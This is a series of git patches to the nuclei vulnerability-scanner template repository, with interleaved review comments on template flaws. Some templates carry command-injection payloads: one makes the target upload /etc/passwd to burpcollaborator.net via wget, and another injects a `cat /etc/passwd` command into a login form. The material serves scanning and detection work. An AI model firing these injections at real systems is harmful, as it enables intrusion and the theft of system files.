diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml index 20c5de9092..23f6fec09b 100644 --- a/exposed-panels/nessus-panel.yaml +++ b/exposed-panels/nessus-panel.yaml @@ -10,7 +10,7 @@ requests: path: - "{{BaseURL}}/server/status" headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: - type: word From c1d72cad18763574505e07c0d76278a30f3fe72a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 15:47:31 +0000 Subject: [PATCH 192/370] Auto Update README [Tue Mar 2 15:47:31 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 8d2e21d071..ec35c6bc52 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 | -| exposures | 55 | technologies | 47 | misconfiguration | 49 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 91 | +| exposures | 55 | technologies | 47 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 653 files**. +**68 directories, 655 files**. From 5ad57ae1644425d0a234ed088a2167203e4b0da5 Mon Sep 17 00:00:00 2001 From: Joan Bono Date: Tue, 2 Mar 2021 16:51:57 +0100 Subject: [PATCH 193/370] Update burp-api-detect.yaml --- technologies/burp-api-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 4558ae4b04..f5d0fefe0f 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/v0.1/" + - "{{BaseURL}}/v0.1/" matchers-condition: and matchers: - type: word From e12ec9828a5dfb7f31a307bbc8932a7475218675 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:23:54 +0530 Subject: [PATCH 194/370] Update burp-api-detect.yaml --- technologies/burp-api-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index f5d0fefe0f..68a7000ee7 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -10,7 +10,8 @@ requests: - method: GET path: - "{{BaseURL}}/v0.1/" - matchers-condition: and + + matchers-condition: and matchers: - type: word words: From fe6f91c6a057aca3bacdb69035f7392629bf1ae9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:01:57 +0000 Subject: [PATCH 195/370] Auto Update README [Tue Mar 2 16:01:57 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index ec35c6bc52..f0095873e0 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 91 | -| exposures | 55 | technologies | 47 | misconfiguration | 50 | +| cves | 218 | vulnerabilities | 104 | exposed-panels | 94 | +| exposures | 55 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 655 files**. +**68 directories, 659 files**. From a97f89623ab1d92382e871efecc63f1b28a607f9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:37:41 +0530 Subject: [PATCH 196/370] Update exposed-hg.yaml --- exposures/configs/exposed-hg.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml index 471370bb53..eb1cdf46bd 100644 --- a/exposures/configs/exposed-hg.yaml +++ b/exposures/configs/exposed-hg.yaml @@ -3,16 +3,20 @@ id: exposed-hg info: name: Exposed HG Directory author: daffainfo - severity: medium + severity: low requests: - method: GET path: - "{{BaseURL}}/.hg/hgrc" - + matchers: - type: word words: - "[paths]" - "default" condition: and + + - type: status + status: + - 200 \ No newline at end of file From fb74bf520f9967b7dccae4684af56dfcd199b9ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:09:15 +0000 Subject: [PATCH 197/370] Auto Update README [Tue Mar 2 16:09:15 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f0095873e0..995990edc5 100644 --- a/README.md +++ b/README.md 
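Review bot: In exposures/configs/exposed-hg.yaml the new `- type: status` matcher is added without a `matchers-condition: and`, and none appears in the hunk's context (which runs from `requests:` down through `matchers:`), so nuclei's default `or` applies and any 200 answer for `/.hg/hgrc` — a catch-all route, a custom 404 served as 200 — now matches on its own, bypassing the `[paths]`/`default` word check. Insert `matchers-condition: and` above `matchers:`, as patches 218, 221 and 223 later do for exposed-bzr, exposed-bitkeeper and exposed-darcs, which ship with the same omission in patches 202–204 on this page. The `\ No newline at end of file` marker also shows the file now ends without a trailing newline.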
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 218 | vulnerabilities | 104 | exposed-panels | 94 | -| exposures | 55 | technologies | 48 | misconfiguration | 50 | +| exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 659 files**. +**68 directories, 660 files**. From fdd015042f2e00fe8c87e9c419e1b8cc626baf20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Tue, 2 Mar 2021 21:42:00 +0530 Subject: [PATCH 198/370] Update simple-employee-rce.yaml --- vulnerabilities/other/simple-employee-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index ea9315f3fe..68bfa3a63a 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: critical reference: https://www.exploit-db.com/exploits/49596 - tags: employee,rce + tags: rce requests: - raw: From 3d3fb849065a6090d0e804175df86f184840dd56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:12:53 +0000 Subject: [PATCH 199/370] Auto Update README [Tue Mar 2 16:12:53 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 995990edc5..f939899b3b 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 104 | exposed-panels | 94 | +| cves | 218 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 660 files**. +**68 directories, 661 files**. From 38e0a570333d750235f0af383c3ebb7c9dfb7611 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Mar 2021 16:27:43 +0000 Subject: [PATCH 200/370] Auto Update README [Tue Mar 2 16:27:43 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f939899b3b..3bee77c9e6 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 218 | vulnerabilities | 105 | exposed-panels | 94 | +| cves | 219 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 661 files**. +**68 directories, 662 files**. From a236c53d68f386d1093e61a834dc319e40e09b77 Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 3 Mar 2021 00:43:48 +0700
Subject: [PATCH 201/370] Update CVE-2021-21315.yaml
---
 cves/2021/CVE-2021-21315.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml
index 472a39ab34..d638b12209 100644
--- a/cves/2021/CVE-2021-21315.yaml
+++ b/cves/2021/CVE-2021-21315.yaml
@@ -10,7 +10,7 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcolaborator.net)"
+ - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
 matchers-condition: and
 matchers:
@@ -22,7 +22,7 @@ requests:
 - type: word
 words:
- - "wget --post-file /etc/passwd burpcolaborator.net"
+ - "wget --post-file /etc/passwd burpcollaborator.net"
 part: body
 condition: and
From 5d3250c172674e48f97a12841b5c322fdc164555 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Wed, 3 Mar 2021 07:40:51 +0700
Subject: [PATCH 202/370] Create exposed-bzr.yaml
---
 exposures/configs/exposed-bzr.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 exposures/configs/exposed-bzr.yaml
diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml
new file mode 100644
index 0000000000..a931b7c200
--- /dev/null
+++ b/exposures/configs/exposed-bzr.yaml
@@ -0,0 +1,22 @@
+id: exposed-bzr
+
+info:
+ name: Exposed BZR Directory
+ author: daffainfo
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.bzr/branch/branch.conf"
+
+ matchers:
+ - type: word
+ words:
+ - "parent_location"
+ - "push_location"
+ condition: or
+
+ - type: status
+ status:
+ - 200
From d5b8d16a2b014c857b6ddd353e2fa882761fb66c Mon Sep 17 00:00:00 2001
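Review bot: Both matchers in cves/2021/CVE-2021-21315.yaml only check that the literal string `wget --post-file /etc/passwd burpcollaborator.net` is reflected in the response body, yet the request line still asks the target to upload /etc/passwd to burpcollaborator.net, a host the operator running nuclei does not control; the typo fix makes that outbound delivery more likely to succeed, not less. Because detection here is purely reflection-based, the command inside `$(...)` does not need to exfiltrate anything — a harmless marker command gives the same match while keeping target data from leaving to a third party. The template's `description` (outside this hunk) should at least state that the payload causes an outbound request from the scanned host.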
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 3 Mar 2021 08:05:30 +0700 Subject: [PATCH 203/370] Create exposed-darcs.yaml --- exposures/configs/exposed-darcs.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 exposures/configs/exposed-darcs.yaml diff --git a/exposures/configs/exposed-darcs.yaml b/exposures/configs/exposed-darcs.yaml new file mode 100644 index 0000000000..623c59a8f7 --- /dev/null +++ b/exposures/configs/exposed-darcs.yaml @@ -0,0 +1,20 @@ +id: exposed-darcs + +info: + name: Exposed Darcs Directory + author: daffainfo + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/_darcs/prefs/binaries" + + matchers: + - type: word + words: + - "Binary file regexps" + + - type: status + status: + - 200 From 463b9477007c9767e9b78587d42b43f119f563f2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 3 Mar 2021 08:19:24 +0700 Subject: [PATCH 204/370] Create exposed-bitkeeper.yaml --- exposures/configs/exposed-bitkeeper.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposures/configs/exposed-bitkeeper.yaml diff --git a/exposures/configs/exposed-bitkeeper.yaml b/exposures/configs/exposed-bitkeeper.yaml new file mode 100644 index 0000000000..03d1f53634 --- /dev/null +++ b/exposures/configs/exposed-bitkeeper.yaml @@ -0,0 +1,23 @@ +id: exposed-bitkeeper + +info: + name: Exposed BitKeeper Directory + author: daffainfo + severity: low + +requests: + - method: GET + path: + - "{{BaseURL}}/BitKeeper/etc/config" + + matchers: + - type: word + words: + - "logging" + - "email" + - "description" + condition: and + + - type: status + status: + - 200 From 6f9c901ca7c6a8993f65326945cdc5827196eef2 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Wed, 3 Mar 2021 11:58:28 +0530 Subject: [PATCH 205/370] misc updates --- cves/2021/CVE-2021-3129.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 9b4c249733..4137a0ebc4 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -1,10 +1,10 @@ id: CVE-2021-3129 info: - name: Ignition Laravel RCE + name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION author: z3bd severity: critical - description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. reference: https://www.ambionics.io/blog/laravel-debug-rce tags: cve,cve2021,laravel,rce From 70920a58d825a3195aa3f947934a0c61b7b6ef28 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 3 Mar 2021 15:01:29 +0800 Subject: [PATCH 206/370] add ilo-detect.yaml --- technologies/ilo-detect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/ilo-detect.yaml diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml new file mode 100644 index 0000000000..148a7645ef --- /dev/null +++ b/technologies/ilo-detect.yaml @@ -0,0 +1,19 @@ +id: ilo-detect + +info: + name: HP iLO + author: milo2012 + severity: info + description: Version of HP iLO + +requests: + - method: GET + path: + - "{{BaseURL}}/xmldata?item=all" + + extractors: + - type: regex + part: body + regex: + - "(.*)" + From 166a8b2cddd5f3a02326a701026b95765da736c9 Mon Sep 17 00:00:00 2001 
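Review bot: The new technologies/ilo-detect.yaml has no `matchers` at all and its only extractor is `regex: - "(.*)"`, so as rendered the template reports every host that answers `/xmldata?item=all` and extracts whole lines of whatever comes back. If the regex originally wrapped an XML element name that was lost in rendering, restore it; otherwise anchor it on a token that only the iLO XML response contains and add a `- type: word` matcher on the same token so a generic 200 page is not reported as iLO. The ilo-detect hunk of patch 225 near the end of this page adds only a `status: 200` matcher, which does not address this, and the second request of cves/CVE-2017-12542.yaml in patch 208 copies the same `(.*)` extractor.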
From: Keith Date: Wed, 3 Mar 2021 15:05:09 +0800 Subject: [PATCH 207/370] add --- technologies/ilo-detect.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 148a7645ef..f55b451afa 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -1,19 +1,15 @@ id: ilo-detect - info: name: HP iLO author: milo2012 severity: info description: Version of HP iLO - requests: - method: GET path: - "{{BaseURL}}/xmldata?item=all" - extractors: - type: regex part: body regex: - "(.*)" - From 1641af394891b89d24e31b34077c2a704665c110 Mon Sep 17 00:00:00 2001 From: Keith Date: Wed, 3 Mar 2021 15:42:53 +0800 Subject: [PATCH 208/370] add CVE-2017-12542.yaml --- cves/CVE-2017-12542.yaml | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/CVE-2017-12542.yaml diff --git a/cves/CVE-2017-12542.yaml b/cves/CVE-2017-12542.yaml new file mode 100644 index 0000000000..544999fc88 --- /dev/null +++ b/cves/CVE-2017-12542.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2017-12637
+
+info:
+ name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53
+ author: apt-mirror
+ severity: high
+ description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
+ tags: cve,cve2017,hp,ilo,traversal
+
+ # References:
+ # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/
+ # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ # - [3] https://github.com/skelsec/CVE-2017-12542
+
+requests:
+ - raw:
+ - |
+ GET /rest/v1/AccountService/Accounts HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ Upgrade-Insecure-Requests: 1
+ matchers:
+ - type: word
+ words:
+ - "Items"
+ part: body
+ - method: GET
+ path:
+ - "{{BaseURL}}/xmldata?item=all"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "(.*)"
+
From c714982a674d6ba75226b059c422ab40b6e94eb8 Mon Sep 17 00:00:00 2001
From: Keith
Date: Wed, 3 Mar 2021 15:44:28 +0800
Subject: [PATCH 209/370] add CVE-2017-12542.yaml
---
 cves/CVE-2017-12542.yaml | 5 -----
 1 file changed, 5 deletions(-)
diff --git a/cves/CVE-2017-12542.yaml b/cves/CVE-2017-12542.yaml
index 544999fc88..b4879edd9a 100644
--- a/cves/CVE-2017-12542.yaml
+++ b/cves/CVE-2017-12542.yaml
@@ -1,17 +1,14 @@
 id: CVE-2017-12637
-
 info:
 name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53
 author: apt-mirror
 severity: high
 description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found.
 tags: cve,cve2017,hp,ilo,traversal
-
 # References:
 # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/
 # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542
 # - [3] https://github.com/skelsec/CVE-2017-12542
-
 requests:
 - raw:
 - |
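Review bot: `id: CVE-2017-12637` in the new cves/CVE-2017-12542.yaml does not match the file name or the three CVE-2017-12542 URLs in the comment below it, so every finding from this template would be reported under the wrong CVE. The lone `words: - "Items"` matcher on the raw request has no status check and no `matchers-condition`, so an error or login page that happens to contain "Items" counts as a bypass; pair it with `- type: status` / `status: - 200` under `matchers-condition: and`. The `# References:` block is not machine-readable — move the URLs into a `reference:` key in `info` — and `traversal` in `tags` does not describe the authentication bypass the description names.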
@@ -30,10 +27,8 @@ requests: - method: GET path: - "{{BaseURL}}/xmldata?item=all" - extractors: - type: regex part: body regex: - "(.*)" - From 20bb69d923bde6ec0e6c416fe9724c528b6d2837 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 3 Mar 2021 20:44:11 +0700 Subject: [PATCH 210/370] Create CVE-2020-21224.yaml --- cves/2020/CVE-2020-21224.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-21224.yaml diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml new file mode 100644 index 0000000000..69a079db8f --- /dev/null +++ b/cves/2020/CVE-2020-21224.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-21224 + +info: + name: ClusterEngine V4.0 RCE + author: pikpikcu + severity: critical + reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul + tags: cve,cve2020,clusterengine,rce + +requests: + - method: POST + path: + - '{{BaseURL}}/login.php' + body: "op=login&username=;`cat /etc/passwd`&password=" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From 9bc22f64bf1fa7835b4e8e860741c25d98dbefdd Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 02:09:10 +0700 Subject: [PATCH 211/370] Create microsoft-echange-server-detect.yaml --- .../microsoft-echange-server-detect.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 technologies/microsoft-echange-server-detect.yaml diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml new file mode 100644 index 0000000000..5436a95fff --- /dev/null +++ b/technologies/microsoft-echange-server-detect.yaml 
@@ -0,0 +1,34 @@
+id: microsoft-echange-server-detect
+
+info:
+ name: Microsoft Exchange Server Detect
+ author: pikpikcu
+ severity: info
+ reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
+ description: |
+ Check for Issues Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/owa/"
+ - "{{BaseURL}}/owa/auth/logon.aspx"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - 302
+ - type: regex
+ regex:
+ - "X-Owa-Version: (15.2.720|15.1.2106|15.0.1496|14.0.496|14.3.513)"
+ - "Location: "
+ part: header
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - X-Owa-Version
+ - Location
From aabd1ed2f75ab4d49f99f99f6f9b13e250d90d1b Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 4 Mar 2021 01:56:35 +0530
Subject: [PATCH 212/370] Update CVE-2020-21224.yaml
---
 cves/2020/CVE-2020-21224.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml
index 69a079db8f..717ea1fd0d 100644
--- a/cves/2020/CVE-2020-21224.yaml
+++ b/cves/2020/CVE-2020-21224.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-21224
 info:
- name: ClusterEngine V4.0 RCE
+ name: Inspur ClusterEngine V4.0 RCE
 author: pikpikcu
 severity: critical
 reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
@@ -23,4 +23,4 @@ requests:
 - type: status
 status:
- - 200
+ - 200
\ No newline at end of file
From e867e684469ae17697a4e718cd142604015ed53d Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 3 Mar 2021 20:28:32 +0000
Subject: [PATCH 213/370] Auto Update README [Wed Mar 3 20:28:32 UTC 2021] :robot:
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 3bee77c9e6..5c04c3b8f9 100644
--- a/README.md
+++ b/README.md
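Review bot: The `id` and the file name both spell the product `echange` (`microsoft-echange-server-detect`), a typo that every later reference to the template will have to carry; fix it before the name spreads. In the header regex `X-Owa-Version: (15.2.720|15.1.2106|15.0.1496|14.0.496|14.3.513)` the dots are unescaped, so each `.` also matches any character, and the hard-coded build list silently goes stale as new Exchange builds ship; a comment such as `# build list mirrors the referenced .nse script; refresh when new CUs are released` would tell the next maintainer where the numbers come from. The description says the template checks the four CVEs, but the matchers only establish that OWA answers with a version header and a `Location:` line, so `Detects Exchange OWA and extracts X-Owa-Version for manual CVE mapping` describes it more honestly.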
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 219 | vulnerabilities | 105 | exposed-panels | 94 | +| cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 56 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 662 files**. +**68 directories, 663 files**. From 6e5d9edaed130543bd96df17b9f958ce19bbfa3d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 4 Mar 2021 05:58:37 +0700 Subject: [PATCH 214/370] Update phpinfo.yaml --- exposures/configs/phpinfo.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 1dd783b000..8675a8fe21 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: pd-team + author: pd-team & daffainfo severity: low requests: @@ -23,6 +23,10 @@ requests: - "{{BaseURL}}/temp.php" - "{{BaseURL}}/PHPInfo.php" - "{{BaseURL}}/old_phpinfo.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/infos.php" + - "{{BaseURL}}/linusadmin-phpinfo.php" + - "{{BaseURL}}/php-info.php" matchers: - type: word words: From 93a4294a5062a864dab1c75102b97e09cea2061f Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 12:15:16 +0700 Subject: [PATCH 215/370] Update microsoft-echange-server-detect.yaml --- technologies/microsoft-echange-server-detect.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) 
diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml index 5436a95fff..05a88b55a3 100644 --- a/technologies/microsoft-echange-server-detect.yaml +++ b/technologies/microsoft-echange-server-detect.yaml @@ -6,12 +6,11 @@ info: severity: info reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse description: | - Check for Issues Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. - + Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data. + requests: - method: GET path: - - "{{BaseURL}}/owa/" - "{{BaseURL}}/owa/auth/logon.aspx" matchers-condition: and @@ -19,16 +18,14 @@ requests: - type: status status: - 200 - - 302 + - type: regex regex: - - "X-Owa-Version: (15.2.720|15.1.2106|15.0.1496|14.0.496|14.3.513)" - - "Location: " - part: header + - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" + part: all extractors: - type: kval part: header kval: - X-Owa-Version - - Location From 6dbb855e62c30f1d693ff1973d61211de01741c2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 13:34:30 +0530 Subject: [PATCH 216/370] payload update --- default-logins/apache/tomcat-manager-default.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml index 9baec5b68e..6e874092cb 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-manager-default.yaml 
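Review bot: In the new regex `(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)` the first alternative already matches any response carrying the `X-Owa-Version` header, so the four path branches never narrow the result, and the trailing `.*` in each makes them accept any suffix anyway; with `part: all` this is an OWA presence check, not a version check. The `description` kept in the same hunk still says the template checks the four CVEs; rewording it to `Detects Exchange Outlook Web App and extracts X-Owa-Version; map the build to the CVEs separately.` keeps the output from being read as a vulnerability verdict. Dropping `302` from the status list together with the `/owa/` path also means a host that redirects `/owa/auth/logon.aspx` no longer matches at all, which may be intended but is worth a comment. It is also worth verifying that the `kval` extractor accepts the hyphenated key `X-Owa-Version` on the nuclei version in use.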
